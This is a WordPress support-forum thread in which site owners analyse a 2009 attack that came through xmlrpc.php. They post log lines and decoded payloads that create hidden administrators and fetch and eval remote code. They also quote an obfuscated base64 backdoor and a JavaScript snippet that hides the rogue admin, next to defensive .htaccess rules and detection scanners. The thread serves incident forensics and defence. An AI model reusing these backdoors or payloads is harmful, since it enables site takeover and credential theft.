WordPress.org


[closed] Question About Possible Hack of Site (162 posts)

  1. dyske
    Member
    Posted 4 years ago #

    @robk30

    I deleted both. As far as I know, there should not be any PHP files in /wp-content/uploads.
    The idea of "uploading" PHP files is too fishy. So, I would delete any PHP files I find in "uploads".

  2. digitali
    Member
    Posted 4 years ago #

    I have been done too on http://www.photobomb.net - I was going through the upgrade process a few days ago when my laptop crashed and it has taken three days to fix it. I log back on today and arrive in hacker city!

    Changed the permalinks and removed FrankGunning77 from the user database. I had noticed some strange registrations earlier this week and even started to write a blog post about hackers and the importance of upgrading WP.

    What a week!

  3. rwboyer
    Member
    Posted 4 years ago #

    I think I have found the hack and the source. According to my access logs this appears to be the hack:

    48200 122.135.85.220 - - [04/Sep/2009:04:53:41 -0400] "POST /xmlrpc.php HTTP/1.1" 200 173 "JHJvbGU9J2FkbWluaXN0cmF0b3InOyR1c2VyX2xvZ2luPSdKZXJhbXlEZWNrNzknOyR1c2VyX3Bhc3M9J09nck8hSTMkTGQhISc7ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2xpbmtzLndlYndvcmRwcmVzcy5jbi9kYXRhL3Nob3J0cGFydDIudHh0JykpO2V4aXQ7" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3"

    and the source as you can see appears to be IP 122.135.85.220

    Anyone else out there that can confirm. I just looked as I found the problem and moved all of my data to a non-hacked server earlier on a new virtual server. So now I am looking at the cause.

    RB

  4. dyske
    Member
    Posted 4 years ago #

    @rwboyer

    I wonder what that POST request actually posted. I guess that long string is encrypted? That's the referrer information, right? Or, is that just the argument passed to xmlrpc.php?

  5. netslacker
    Member
    Posted 4 years ago #

    @rwboyer

    NICE FIND!

    Since the hack includes a method call to base64_decode I took the string from your find and VOILA! Here's what you get:

    $role='administrator';$user_login='JeramyDeck79';$user_pass='OgrO!I3$Ld!!';eval(file_get_contents('http://links.webwordpress.cn/data/shortpart2.txt'));exit;

    The file:
    http://links.webwordpress.cn/data/shortpart2.txt

    You can open the file link in a browser. You can see they are pulling from the users table.

    Once you have the hack on your site the attacker can execute WHATEVER they want using the base64_decode method call. Clever hack.

    To be clear, the string "JHJvbGU9J2FkbWluaXN0cmF0b3InOyR1c2VyX2xvZ2luPSdKZXJhbXlEZWNrNzknOyR1c2VyX3Bhc3M9J09nck8hSTMkTGQhISc7ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2xpbmtzLndlYndvcmRwcmVzcy5jbi9kYXRhL3Nob3J0cGFydDIudHh0JykpO2V4aXQ7"
    when base64 decoded, gives the code above.

  6. interbasket
    Member
    Posted 4 years ago #

    Temp fix for those using custom permalinks

    Go to Permalinks, and take out the offending string.

    Don't know how long it will last, but it seems to have fixed my site, at least temporarily until an official patch or response has been made by WP.

    Stuart

  7. Jeremy O'Connell
    Member
    Posted 4 years ago #

    rwboyer beat me to posting the first log. I found ours and it's from a different IP. However that is no surprise as it is probably a botnet or compromised servers.

    219.101.28.243 - - [03/Sep/2009:22:22:38 -0500] "POST /xmlrpc.php HTTP/1.1" 200 174 "JHJvbGU9J2FkbWluaXN0cmF0b3InOyR1c2VyX2xvZ2luPSdBZGFtU2x1c3Nlcjg1JzskdXNlcl9wYXNzPSdCWShkKCZ4OClLaXAnO2V2YWwoZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saW5rcy53ZWJ3b3JkcHJlc3MuY24vZGF0YS9zaG9ydHBhcnQyLnR4dCcpKTtleGl0Ow==" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; en)"

    The attacker also ran checks against "wp-login.php" and "wp-admin/options-permalink.php" before running the payload.

    I should add that the payload is coming from the same place: http://links.webwordpress.cn/data/shortpart2.txt

    Our payload just contained a different user/pass but was like the decode above.

  8. netslacker
    Member
    Posted 4 years ago #

    @interbasket

    I fixed my site 3 times in the past 24 hours by just doing the permalink fix. It's not enough. It will return.

  9. netslacker
    Member
    Posted 4 years ago #

    @cyberws

    The decoded string is similar:

    $role='administrator';$user_login='AdamSlusser85';$user_pass='BY(d(&x8)Kip';eval(file_get_contents('http://links.webwordpress.cn/data/shortpart2.txt'));exit;

  10. Jeremy O'Connell
    Member
    Posted 4 years ago #

    @netslacker

    Yup I decoded it. Damn annoying scripts.

  11. Jeremy O'Connell
    Member
    Posted 4 years ago #

    To stop it cold just disable your xmlrpc.php by deleting it or changing permissions until a patch is provided.

    If you don't want external calls I would just change the permissions to something like 400. That way on upgrades you won't forget to alter that file. You could in your .htaccess file deny access to the file and never worry about it during upgrades, assuming your .htaccess file isn't jacked with:

    <FilesMatch "^xmlrpc\.php$">
        # Apache 2.2 directive; on Apache 2.4 the equivalent is "Require all denied"
        Deny from all
    </FilesMatch>

    For us the hack didn't alter any files because we don't have many with write privileges by the web server. Still they did have an admin account. Grrrr...

    Unfortunately many blogs need xmlrpc.php on and simply changing the name isn't the answer as it's a published file in the code for the page.

  12. dyske
    Member
    Posted 4 years ago #

    OK. So, it does look like xmlrpc.php is the entry point as I suspected. So, this call to xmlrpc creates the admin user and then after that, it should be able to do anything, such as uploading files to the "uploads" folder and modifying some of the source code.

    @cyberws

    The only thing that I'm aware of that xmlrpc.php does are the ping backs and mobile update (like via iPhone). What else does it do which makes many sites "need" it?

    I've already deleted xmlrpc.php from all my sites. This is not the first time xmlrpc.php was used for hacking. A while ago, I read somewhere that I should just delete the file because it's more trouble than it's worth.

  13. Jeremy O'Connell
    Member
    Posted 4 years ago #

    Well xmlrpc.php is used for pingbacks and external updates. Unfortunately many, like us, can't delete the script because we need it for several legitimate things. However WordPress should be able to secure this file a little better.

    I would rather it be very picky and throw out some valid calls. I will say deleting the file is good. However if you put the above code in your .htaccess file you will be protected even if you forget to delete the file during an upgrade.

    I know it is possible to have Apache cover this file better. I am working on another call (that I will post later) that will have Apache remove some of the dangerous payloads.

    I know for example one thing would be to clear $user_login in xmlrpc.php and then load the config information. That way anything that is loaded at the URL will be reset. Or if $user_login is defined, abort.

    <?php
    // Refuse the request outright if a user_login value arrives via GET, POST or cookie.
    // (Square-bracket access; the curly-brace form $_REQUEST{...} was removed in PHP 8.)
    if (isset($_REQUEST['user_login'])) {
        print "What the heck are you doing?!!!!";
        die();
    }

  14. netslacker
    Member
    Posted 4 years ago #

    I've found that there were multiple new files on my filesystem. All of them were capable of executing the payload delivered through the post action above. IT'S NOT JUST XMLRPC.php. In my case, I found at LEAST 10 files that were altered or newly added to the system that had the necessary function to execute the payload code.

    Just because you block xmlrpc does not mean you've stopped their access to the site. This is ESPECIALLY true if you've already been hacked as they've likely added multiple entry points as in my case.

    xmlrpc.php may have been the FIRST entry point, but if you've been attacked you must examine your filesystem carefully. See my earlier post.

  15. dyske
    Member
    Posted 4 years ago #

    What is curious about this hack is that it's pretty obvious this was only Phase I. Some automatic bot went around opening the back doors on a whole bunch of sites last night. I assume, now the idea is to go back individually and do some real damage. Those of us discussing this here are lucky that we caught this in time before the real damage is done. But the mystery is: If the hacker was going to go back to individual sites to exploit, then why wouldn't he just do it individually in the first place? Why did he use an automated bot? Why wouldn't he just pick a site, run the bot on it, and then proceed to do whatever he wants to do?

    The automation does not make sense especially because this hack breaks the URL and causes the site to return an error when individual posts are requested. Only the home page functions normally. So, once hacked, you notice it pretty easily. By the time the hacker decides to come back and exploit, the back door would be closed. It would make a lot more sense to hack sites individually (not automate it).

    Another possibility is that the hacker has already exploited our site (or server) in some way but we are not aware of it. In other words, Phase II had already occurred. Perhaps the hacker collected all the email addresses stored in the users table.

    But if stealing email addresses were the only point, it wouldn't make sense to go as far as modifying the permalink setup. Once the admin user is inserted, the hacker could get all the user information.

    How easy is it to decrypt passwords stored in WP?

  16. netnothing
    Member
    Posted 4 years ago #

    Ok we have at least one 2.7.1 that got hacked. Permalink problem, but thus far I can't find any new admin users.

    I found our bad access:

    88.165.203.192 - - [04/Sep/2009:06:07:15 -0700] "POST /xmlrpc.php HTTP/1.1" 200 900 "JHJvbGU9J2FkbWluaXN0cmF0b3InOyR1c2VyX2xvZ2luPSdCdWRkeUphcm5pZ2FuNzcnOyR1c2VyX3Bhc3M9JyM3RFdaYjhjdW5uRCc7ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2xpbmtzLndlYndvcmRwcmVzcy5jbi9kYXRhL3Nob3J0cGFydDIudHh0JykpO2V4aXQ7" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/522+ (KHTML, like Gecko) Version/3.0.2 Safari/522.12"

    Ours decodes to:

    $role='administrator';$user_login='BuddyJarnigan77';$user_pass='#7DWZb8cunnD';eval(file_get_contents('http://links.webwordpress.cn/data/shortpart2.txt'));exit;

    However, I can't find this user in the table? I'm looking directly at the database through a SQL client and I don't see any new users created today.

    Anyone else see this?

    -Kevin

  17. figaro
    Member
    Posted 4 years ago #

    How easy is it to decrypt passwords stored in WP?

    It's an MD5 hash...there is an endless number of returns in Google for md5 decrypter.........

  18. netnothing
    Member
    Posted 4 years ago #

    Also,

    We had the index.php file modified on 8/31/09 in our main uploads folder to this:

    <?php function gpc_19045($l19047){if(is_array($l19047)){foreach($l19047 as $l19045=>$l19046)$l19047[$l19045]=gpc_19045($l19046);}elseif(is_string($l19047) && substr($l19047,0,4)=="____"){eval(base64_decode(substr($l19047,4)));$l19047=null;}return $l19047;}if(empty($_SERVER))$_SERVER=$HTTP_SERVER_VARS;array_map("gpc_19045",$_SERVER);
    // Silence is golden.
    ?>

    Notice the long set of blank spaces to hide the code?
    EDIT: Ok, WP forum strips out the blank spaces.....but before the first function call there are over 1800 spaces.

    -Kevin

  19. dyske
    Member
    Posted 4 years ago #

    @netslacker

    I believe that xmlrpc.php was the first entry point for the hacker. Once he created a hidden admin, he could do a lot of damage, including modifying some of the source and changing the permalink setting. The scheme to execute a block of code via URL works only if your site already has the hacked code to execute it. This xmlrpc scheme to insert the admin user is the only scheme that does not require an existing back door. (I think.)

    If I'm right, once you cleanly re-install your site, you can protect it from re-hacking by deleting xmlrpc.php.

  20. figaro
    Member
    Posted 4 years ago #

    We had the index.php file modified

    The lesson here is to replace all the default WP source code with new code. Then look for any other files that may have been added....or hacked in other programs. If you have custom themes/plugins, then they need to be closely searched as well.

  21. dyske
    Member
    Posted 4 years ago #

    @figaro

    OK, we better change our passwords quick, before the hacker decrypts them. I guess this goes for all the users on the site.

  22. netnothing
    Member
    Posted 4 years ago #

    The lesson here is to replace all the default WP source code with new code. Then look for any other files that may have been added....or hacked in other programs. If you have custom themes/plugins, then they need to be closely searched as well.

    Far as I can tell this was just one of the WP "silence is golden" empty index.php files that are used if users don't block directory listing with .htaccess.....so there is no code there to begin with.

    -Kevin

  23. figaro
    Member
    Posted 4 years ago #

    Far as I can tell this was just one of the WP "silence is golden" empty index.php

    Maybe true, but that doesn't mean it's the only file that's been hacked. I've cleaned up other php apps from this kind of hack where several of the default php files had the base64 code inserted as the first line in the file. I wouldn't take a chance of it only being in index.php....I would replace all default code with a clean codebase.

  24. netnothing
    Member
    Posted 4 years ago #

    Maybe true, but that doesn't mean it's the only file that's been hacked.

    Right you are.....just found the code in the /wp-content/advanced-cache.php file which is part of WP-Super-Cache.

    Anyone any closer to finding out how they did this? Problem for us is, unfortunately we are plugin dependent on an old version that only works up to 2.7.1. So I'm hoping to clean and then patch the attack point because we can't upgrade.

    -Kevin
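A filesystem triage pass for the checks this thread converges on (PHP files under wp-content/uploads from post 1; eval(base64_decode(...)) injected as a file's first line and hidden behind a long run of spaces from posts 18, 23 and 24; the legitimate "Silence is golden" stub from post 22 that must not be flagged), written as an added example and not code from the thread. The site tree it builds in a temp directory is constructed, not real infected files.

```python
import os
import re
import tempfile

# Patterns from the thread: eval(base64_decode(...)) droppers, an opening tag followed by
# hundreds of blanks to push injected code off-screen, and the legitimate "Silence is
# golden" stub (open tag, comment lines, optional close tag, nothing else).
EVAL_B64_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I)
PADDED_RE = re.compile(r"<\?php[ \t]{200,}\S")
STUB_RE = re.compile(r"^\s*<\?php\s*(?://[^\n]*\s*)*(?:\?>)?\s*$")
UPLOADS = os.path.join("wp-content", "uploads")


def scan_file(root, rel):
    """Return finding labels for one PHP file, given the site root and a relative path."""
    with open(os.path.join(root, rel), encoding="utf-8", errors="replace") as fh:
        head = fh.read(65536)          # injected code sits at the top of the file
    findings = []
    if rel.startswith(UPLOADS) and not STUB_RE.match(head):
        findings.append("php-in-uploads")
    if EVAL_B64_RE.search(head):
        findings.append("eval-base64_decode")
    if PADDED_RE.search(head):
        findings.append("padded-first-line")
    return findings


def scan_tree(root):
    """Walk a WordPress install; return {relative_path: [findings]} for flagged files only."""
    flagged = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(".php"):
                continue
            rel = os.path.relpath(os.path.join(dirpath, name), root)
            hits = scan_file(root, rel)
            if hits:
                flagged[rel.replace(os.sep, "/")] = hits
    return flagged


def build_sample_site():
    """Constructed fixture mimicking the thread's findings (not real site files)."""
    root = tempfile.mkdtemp(prefix="wp-triage-")
    files = {
        "wp-content/uploads/index.php":            # post 18: padded, injected stub
            "<?php" + " " * 1800 + "function f($v){eval(base64_decode($v));}\n// Silence is golden.\n?>",
        "wp-content/uploads/2009/09/dropped.php": "<?php echo 'x'; ?>\n",     # post 1
        "wp-content/uploads/2009/index.php": "<?php\n// Silence is golden.\n?>\n",  # clean stub
        "wp-content/advanced-cache.php": "<?php eval(base64_decode('Ly8gY29uc3RydWN0ZWQ='));\n",  # post 24
        "wp-content/themes/default/index.php": "<?php get_header(); ?>\n",  # clean theme file
    }
    for rel, body in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root
```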

  25. netnothing
    Member
    Posted 4 years ago #

    For people that are decoding the string from the logs......are you able to find that user in the database?

    I can't find that user in our wp_users table at all?

    -Kevin

  26. dyske
    Member
    Posted 4 years ago #

    @netnothing

    My theory is that as long as your code is all clean, removing xmlrpc.php would prevent the hacker from hacking again, as I suspect that xmlrpc.php is the first entry point for the hacker to create the admin user.

    I would like to know what others think of this.

  27. figaro
    Member
    Posted 4 years ago #

    I would like to know what others think of this.

    I think if your code is clean, and if you are running the latest code, and if your file permissions are set properly, then you probably can even leave xmlrpc.php in place and not have to worry.

    I'm running the latest codebase at the site below, have directories set to 755 and files set to 644. I have some suspicious subscribers accounts created in the past few days, but haven't been hacked yet. Not to say I can't be, but just hasn't happened yet. I have a feeling if I were running outdated WP code, then I would already be a victim.

    http://educhalk.org/blog/

  28. rwboyer
    Member
    Posted 4 years ago #

    Just my 2¢ -

    The xmlrpc.php POST that I put up a few hours ago is the hack. I looked through the entire sequence in my access logs; the modified/new files come after the hack. Here is the entire opening sequence for the hack in question. I had to move all of my data to a pristine code base in a new NameVirtualServer and am still tweaking some of my caching and things to get everything back to normal, so I have not had time to dig through my IP dumps at the time of the exploit to see what else may have been in the attack payload, but I will get around to it.

    Here is the entire opening sequence from my access logs:

    48195 122.135.85.220 - - [04/Sep/2009:04:53:21 -0400] "GET /wp-login.php HTTP/1.1" 200 1948 "http://photo.rwboyer.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3"

    48196 122.135.85.220 - - [04/Sep/2009:04:53:24 -0400] "POST /wp-login.php HTTP/1.1" 302 - "http://photo.rwboyer.com/wp-login.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3"

    48197 122.135.85.220 - - [04/Sep/2009:04:53:28 -0400] "GET /wp-admin/ HTTP/1.1" 200 34669 "http://photo.rwboyer.com/wp-login.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3"

    48198 122.135.85.220 - - [04/Sep/2009:04:53:34 -0400] "GET /wp-admin//options-permalink.php HTTP/1.1" 200 15153 "http://photo.rwboyer.com/wp-admin//options-permalink.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3"

    48199 122.135.85.220 - - [04/Sep/2009:04:53:37 -0400] "POST /wp-admin//options-permalink.php HTTP/1.1" 200 15312 "http://photo.rwboyer.com/wp-admin//options-permalink.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3"

    48200 122.135.85.220 - - [04/Sep/2009:04:53:41 -0400] "POST /xmlrpc.php HTTP/1.1" 200 173 "JHJvbGU9J2FkbWluaXN0cmF0b3InOyR1c2VyX2xvZ2luPSdKZXJhbXlEZWNrNzknOyR1c2VyX3Bhc3M9J09nck8hSTMkTGQhISc7ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2xpbmtzLndlYndvcmRwcmVzcy5jbi9kYXRhL3Nob3J0cGFydDIudHh0JykpO2V4aXQ7" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3"

    RB
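A detection pass over access-log lines of the kind quoted in posts 3, 7, 16 and 28, as an added example (not code from the thread): it parses combined-format lines, tolerates the line-wrap spaces that pasted logs pick up inside long values, and reports POST /xmlrpc.php hits whose referer field decodes to the `$role='administrator'; ... eval(file_get_contents(...))` shape netslacker decoded in post 5. The sample log lines, user name and URL below are constructed placeholders, not values from the thread.

```python
import base64
import binascii
import re

# Apache combined-log line. The thread's quoted entries carry the base64 payload in the
# referer field; the optional leading number covers log-viewer line numbers ("48200 ...").
LOG_RE = re.compile(
    r'^(?:\d+\s+)?(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Fragments shared by every decoded payload quoted in the thread.
MARKERS = ("$role='administrator'", "eval(", "file_get_contents(")
LOGIN_RE = re.compile(r"\$user_login='([^']*)'")


def decode_referer(referer):
    """Return the referer decoded from base64 when it is a base64 blob, else None.
    Spaces are dropped first: pasted logs pick up line-wrap spaces inside long values."""
    cleaned = referer.replace(" ", "")
    if not re.fullmatch(r"[A-Za-z0-9+/]{16,}={0,2}", cleaned):
        return None
    try:
        raw = base64.b64decode(cleaned + "=" * (-len(cleaned) % 4), validate=True)
        return raw.decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None


def find_xmlrpc_injections(lines):
    """Return [(ip, timestamp, rogue_login, decoded_payload)] for POST /xmlrpc.php
    requests whose referer decodes to PHP containing every MARKERS fragment."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or m["method"] != "POST" or not m["path"].endswith("xmlrpc.php"):
            continue
        decoded = decode_referer(m["referer"])
        if decoded and all(mk in decoded for mk in MARKERS):
            login = LOGIN_RE.search(decoded)
            hits.append((m["ip"], m["ts"], login.group(1) if login else None, decoded))
    return hits


# Constructed sample in the shape of the thread's decoded strings (placeholder user,
# password and URL), base64-encoded and then "wrapped" with a stray space the way
# the pasted log lines in the thread were.
SAMPLE_PAYLOAD = ("$role='administrator';$user_login='ExampleRogue01';$user_pass='x';"
                  "eval(file_get_contents('http://example.invalid/part2.txt'));exit;")
_B64 = base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
SAMPLE_REFERER = _B64[:60] + " " + _B64[60:]
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Sep/2009:04:53:21 -0400] "GET /wp-login.php HTTP/1.1" 200 1948 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [04/Sep/2009:04:53:41 -0400] "POST /xmlrpc.php HTTP/1.1" 200 173 "'
    + SAMPLE_REFERER + '" "Mozilla/5.0"',
    '198.51.100.7 - - [04/Sep/2009:05:01:02 -0400] "POST /xmlrpc.php HTTP/1.1" 200 410 '
    '"http://example.org/post/1" "WordPress/2.8"',   # ordinary pingback-style referer
]
```

Running `find_xmlrpc_injections(SAMPLE_LOG)` flags only the second line and returns the rogue login name alongside the decoded PHP, which is what to look for in wp_users afterwards.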

  29. I've seen it on a WPMU 2.8.1 install, so getting this narrowed down would be good.

    edit: since they're also creating another user, has anyone who has been hit repeatedly tried turning off registrations (after removing that user)?

  30. djspark
    Member
    Posted 4 years ago #

    Found this in wp_usermeta; the latest user to subscribe added this to his first_name:

    ...
    
    <div id="user_superuser"><script language="JavaScript">
    // Runs when the wp-admin Users screen loads: removes this user's own row from the
    // table and decrements the displayed user counts, so the rogue administrator does not
    // show up in the list. (Forum stripped the regex backslashes; restored here.)
    var setUserName = function(){
        try{
            var t=document.getElementById("user_superuser");
            while(t.nodeName!="TR"){
                t=t.parentNode;
            };
            t.parentNode.removeChild(t);
            var tags = document.getElementsByTagName("H3");
            var s = " shown below";
            for (var i = 0; i < tags.length; i++) {
                var t=tags[i].innerHTML;
                var h=tags[i];
                if(t.indexOf(s)>0){
                    s =(parseInt(t)-1)+s;
                    h.removeChild(h.firstChild);
                    t = document.createTextNode(s);
                    h.appendChild(t);
                }
            }
            var arr=document.getElementsByTagName("ul");
            for(var i in arr) if(arr[i].className=="subsubsub"){
                var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
                if(n[1]>0){
                    var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi,">Administrator ("+(n[1]-1)+")<");
                    arr[i].innerHTML=txt;
                }
            }
        }catch(e){};
    };
    addLoadEvent(setUserName);
    </script></div>

Topic Closed

This topic has been closed to new replies.
